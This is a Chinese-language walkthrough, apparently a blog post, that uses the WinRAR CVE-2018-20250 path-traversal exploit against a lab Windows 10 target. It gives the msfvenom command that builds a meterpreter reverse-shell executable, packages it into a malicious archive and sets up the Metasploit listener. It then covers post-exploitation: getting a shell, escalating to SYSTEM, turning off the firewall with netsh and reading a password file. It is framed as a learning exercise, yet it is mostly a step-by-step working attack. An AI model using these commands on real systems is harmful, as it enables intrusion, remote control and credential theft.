学习交流,技术分享,不要搞事
参考大佬 博客 https://blog.csdn.net/DarkHQ/article/details/88682390
小白一个 一下文章中有 未使用正确的专业术语请。。。。提出或无视
事先准备好 目标渗透机器(后文简称靶机 ip:192.160.25.150 开启防火墙)
(1)下载WinRAR漏洞exp:https://github.com/WyAtu/CVE-2018-20250
(3)编辑winrar漏洞exp文件
vi exp.py
按i进行编辑
修改python3的运行命令
修改完后按esc退出编辑,然后按:,输入wq保存
打开kali系统 并将目录 切换到 CVE-2018-20250 文件目录下 右键在终端打开
在本目录制作exe木马文件
lhost=你kali攻击机的ip iport=统一的端口 建议设置1024数值之上
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.160.25.131 lport=1234 -f exe >./test.exe
受漏洞影响解压软件版本
WinRAR < 5.70 Beta 1
Bandizip< = 6.2.0.0
好压(2345压缩) < = 5.9.8.10907
360压缩< = 4.0.0.1170
制作木马rar文件
python3 exp.py 进行编写
建立网页(可选操作,此操作只是为了更方便的 传输木马rar文件)
python -m SimpleHTTPServer 999
单击启动metasploit 下文简称msf
启用监听1234 端口 (此端口同上)
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.160.25.131
set lport 1234
输入 上文 并 run 启动
在靶机上进行操作
注意 途中会被杀毒软件查杀 ,原因是 此漏洞是被发现且修复的,而且 木马文件并未做免杀处理 ,这里统一处理为 默认允许
受漏洞影响解压软件版本
WinRAR < 5.70 Beta 1
Bandizip< = 6.2.0.0
好压(2345压缩) < = 5.9.8.10907
360压缩< = 4.0.0.1170
切记解压软件版本只能是以上的漏洞版本
重启 win10靶机(木马已经被加入开机启动项)
在cmd中输入 netstart -ano 查看计算机端口占用情况
当前已经产生会话,实现监听
输入 shell 反弹
可以输入用户级别任意命令 可实现远程关机,包括查看文件、删除文件等
shutdown -r -t 5(5秒钟后重启)
权限提升 因为当前获得的权限仅用户权限,需要拿到最高权限windows:system,linux:root
输入 exit 退出
getuid 查看当前获得的权限级别
background 保存并退出会话 ps:查看 当前第几会话
use exploit/windows/local/ask
set session 当前会话
set filename 迷惑名称.exe
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传
run
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传
此时会弹出来对话框 靶机允许
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传
getuid 查看权限
getsystem 提升到system 权限
shell
NetSh Advfirewall set allprofiles state off #关闭防火墙
下列有些命令 自行摸索
Type password.txt
shutdown -r -t 5
NetSh Advfirewall set allprofiles state off #关闭防火墙
Netsh Advfirewall show allprofiles #查看防火墙状态